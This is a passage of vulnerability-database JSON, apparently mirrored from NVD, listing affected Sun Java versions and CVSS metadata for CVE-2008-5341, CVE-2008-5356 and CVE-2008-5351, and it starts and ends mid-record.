"cpe:2.3:a:sun:jre:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_09:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_20:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_22:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_08:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_01:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:-:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update7_b03:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_03:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update8:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.3.1_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_02:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.5.0:update12:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_07:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.6.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.3.1_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:1.5.0:update4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.6.0:update_6:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Unspecified vulnerability in Java Web Start (JWS) and Java Plug-in with Sun JDK and JRE 6 Update 10 and earlier, and JDK and JRE 5.0 Update 16 and earlier, allows untrusted JWS applications to obtain the pathname of the JWS cache and the application username via unknown vectors, aka CR 6727071.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5341", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5341"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5341", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5341", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:27", "description": "Heap-based buffer overflow in Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier might allow remote attackers to execute arbitrary code via a crafted TrueType font file.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5356", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5356"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5356", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5356", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_8:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_14:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_7:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_13:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_15:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_10:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_11:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_11:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_4:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_14:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_12:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_16:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_6:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_12:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_1:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_2:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_13:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_3:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_1:*:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_9:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_5:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_18:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_15:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_1:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:28:26", "description": "Java Runtime Environment (JRE) for Sun JDK and JRE 6 Update 10 and earlier; JDK and JRE 5.0 Update 16 and earlier; and SDK and JRE 1.4.2_18 and earlier accepts UTF-8 encodings that are not the \"shortest\" form, which makes it easier for attackers to bypass protection mechanisms for other applications that rely on shortest-form UTF-8 encodings.", "edition": 5, "cvss3": {}, "published": "2008-12-05T11:30:00", "title": "CVE-2008-5351", "type": "cve", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-5351"], "modified": "2017-09-29T01:32:00", "cpe": ["cpe:/a:sun:jre:1.4.2_4", "cpe:/a:sun:jre:6", "cpe:/a:sun:jre:1.4.2_17", "cpe:/a:sun:jre:1.4.2_7", "cpe:/a:sun:jre:1.4.2_10", "cpe:/a:sun:jre:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_11", "cpe:/a:sun:jre:1.4.2_5", "cpe:/a:sun:sdk:1.4.2_4", "cpe:/a:sun:jre:1.4.2_11", "cpe:/a:sun:jre:1.4.2_12", "cpe:/a:sun:jre:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_8", "cpe:/a:sun:jre:1.4.2_14", "cpe:/a:sun:jre:1.4.2_18", "cpe:/a:sun:jre:1.4.2_3", "cpe:/a:sun:jre:1.4.2_6", "cpe:/a:sun:sdk:1.4.2_9", "cpe:/a:sun:sdk:1.4.2_10", "cpe:/a:sun:sdk:1.4.2_12", "cpe:/a:sun:jre:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_7", "cpe:/a:sun:sdk:1.4.2_13", "cpe:/a:sun:sdk:1.4.2_2", "cpe:/a:sun:jre:1.4.2_15", "cpe:/a:sun:jre:5.0", "cpe:/a:sun:jre:1.4.2_8", "cpe:/a:sun:sdk:1.4.2_14", "cpe:/a:sun:sdk:1.4.2_17", "cpe:/a:sun:sdk:1.4.2_16", "cpe:/a:sun:sdk:1.4.2_6", "cpe:/a:sun:jdk:5.0", "cpe:/a:sun:sdk:1.4.2_18", "cpe:/a:sun:sdk:1.4.2_5", "cpe:/a:sun:jre:1.4.2_2", "cpe:/a:sun:sdk:1.4.2_1", "cpe:/a:sun:sdk:1.4.2_3", "cpe:/a:sun:jre:1.4.2_13", "cpe:/a:sun:jdk:6", "cpe:/a:sun:sdk:1.4.2_15"], "id": "CVE-2008-5351", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-5351", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:sun:jre:1.4.2_4:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_3:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_2:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_5:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_10:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_6:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_7:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:1.4.2_17:*:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:5.0:update_16:*:*:*:*:*:*", "cpe:2.3:a:sun:jdk:6:update_9:*:*:*:*:*:*", "cpe:2.3:a:sun:jre:6:update_8:*:*:*:*:*:*", "cpe:2.3:a:sun:sdk:1.4.2_7:*:*:*:*:*:*:*", 